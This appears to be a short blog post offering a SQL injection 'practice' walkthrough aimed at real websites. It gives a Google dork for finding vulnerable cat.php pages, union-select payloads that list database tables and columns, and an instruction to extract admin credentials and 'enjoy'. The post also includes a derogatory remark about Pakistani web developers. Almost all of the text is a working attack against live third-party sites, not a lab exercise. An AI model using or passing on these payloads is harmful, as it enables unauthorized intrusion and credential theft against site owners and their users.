Well guys for all those who wanna practice sqli i have something for u.
As usuall go to google search inurl:"cat.php?msid
click on any site
all of them are shitty product of some pakistani web developers.......and all are vunlereable.
all the sites have 6 tables
and well just append
+union+select+1,2,group_concat(table_name),4,5,6+f rom+information_schema.tables+where+table_schema=d atabase()--
to the end of the url to get the list of tables
and well
+union+select+1,2,group_concat(column_name),4,5,6+ from+information_schema.columns+where+table_schema =database()--
so get admin id and pass..........and enjoy...............keep practicing : )
No comments:
Post a Comment
Please feel free to comment !!!!!!!!!!!!!